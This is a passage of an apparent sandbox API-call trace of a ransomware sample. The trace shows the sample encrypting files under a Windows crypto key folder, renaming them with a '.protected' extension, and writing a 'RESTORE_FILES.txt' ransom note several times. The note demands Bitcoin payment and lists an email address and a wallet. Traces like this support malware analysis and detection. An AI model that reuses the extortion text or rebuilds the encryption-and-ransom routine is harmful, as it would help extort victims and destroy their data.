[0065.525] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.525] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.525] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\..") returned 54 [0065.525] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.525] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.525] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0065.526] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\RESTORE_FILES.txt") returned 69 [0065.526] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\MachineKeys\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\machinekeys\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0065.527] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.527] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.527] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.527] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.528] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.528] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0065.528] CloseHandle (hObject=0xd4) returned 1 [0065.528] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0065.528] lstrcmpiW (lpString1="S-1-5-18", lpString2="Windows") returned -1 [0065.528] lstrcmpiW (lpString1="S-1-5-18", lpString2="Program Files") returned 1 [0065.528] lstrcmpiW (lpString1="S-1-5-18", lpString2="Program Files (x86)") returned 1 [0065.528] lstrcmpiW (lpString1="S-1-5-18", lpString2="$Recycle.bin") returned 1 [0065.528] lstrcmpiW (lpString1="S-1-5-18", lpString2="System Volume Information") returned -1 [0065.528] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18") returned 48 [0065.528] lstrcmpW (lpString1="S-1-5-18", lpString2=".") returned 1 [0065.528] lstrcmpW (lpString1="S-1-5-18", lpString2="..") returned 1 [0065.528] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*") returned 50 [0065.528] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0065.533] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0065.533] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0065.533] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0065.533] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0065.533] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0065.533] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.") returned 50 [0065.533] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0065.533] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0065.533] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0065.533] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.533] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.533] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\." (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.533] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.533] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0065.533] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0065.533] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0065.533] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0065.534] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0065.534] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\..") returned 51 [0065.534] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0065.534] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0065.534] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0065.534] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0065.534] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.534] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.." (normalized: "c:\\programdata\\microsoft\\crypto\\rsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0065.534] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.534] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Windows") returned -1 [0065.534] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files") returned -1 [0065.534] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files (x86)") returned -1 [0065.534] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="$Recycle.bin") returned 1 [0065.534] lstrcmpiW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="System Volume Information") returned -1 [0065.534] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.534] StrStrIW (lpFirst="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".protected") returned 0x0 [0065.534] lstrcmpW (lpString1="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="RESTORE_FILES.txt") returned -1 [0065.534] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.534] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.534] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0065.534] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.534] StrStrW (lpFirst="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0065.534] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.534] StrStrW (lpFirst="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".rar") returned 0x0 [0065.534] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.534] StrStrW (lpFirst="6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".zip") returned 0x0 [0065.534] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2f, lpOverlapped=0x0) returned 1 [0065.535] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffffd1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.535] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2f, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2f, lpOverlapped=0x0) returned 1 [0065.536] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.536] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0065.536] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0065.536] CloseHandle (hObject=0xd8) returned 1 [0065.536] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 128 [0065.536] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\6d14e4b1d8ca773bab785d1be032546e_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected")) returned 1 [0065.539] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0065.539] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Windows") returned -1 [0065.539] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files") returned -1 [0065.539] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="Program Files (x86)") returned -1 [0065.539] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="$Recycle.bin") returned 1 [0065.539] lstrcmpiW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="System Volume Information") returned -1 [0065.539] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.539] StrStrIW (lpFirst="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".protected") returned 0x0 [0065.539] lstrcmpW (lpString1="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpString2="RESTORE_FILES.txt") returned -1 [0065.539] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0065.539] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0065.539] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0065.539] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.539] StrStrW (lpFirst="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".txt") returned 0x0 [0065.539] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.539] StrStrW (lpFirst="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".rar") returned 0x0 [0065.539] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 118 [0065.539] StrStrW (lpFirst="d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", lpSrch=".zip") returned 0x0 [0065.539] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x41d, lpOverlapped=0x0) returned 1 [0065.570] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xfffffbe3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0065.570] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x41d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x41d, lpOverlapped=0x0) returned 1 [0065.571] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0065.571] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0065.571] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0065.572] CloseHandle (hObject=0xd8) returned 1 [0065.572] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected") returned 128 [0065.572] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\d42cc0c3858a58db2db37658219e6400_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.protected")) returned 1 [0065.573] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0065.573] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0065.573] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RESTORE_FILES.txt") returned 66 [0065.573] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\S-1-5-18\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\s-1-5-18\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0065.576] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0065.576] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0065.577] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0065.577] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0065.577] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0065.577] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0065.577] CloseHandle (hObject=0xd4) returned 1 [0065.578] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0065.578] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0065.578] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt") returned 57 [0065.578] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\RSA\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\rsa\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0065.578] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and 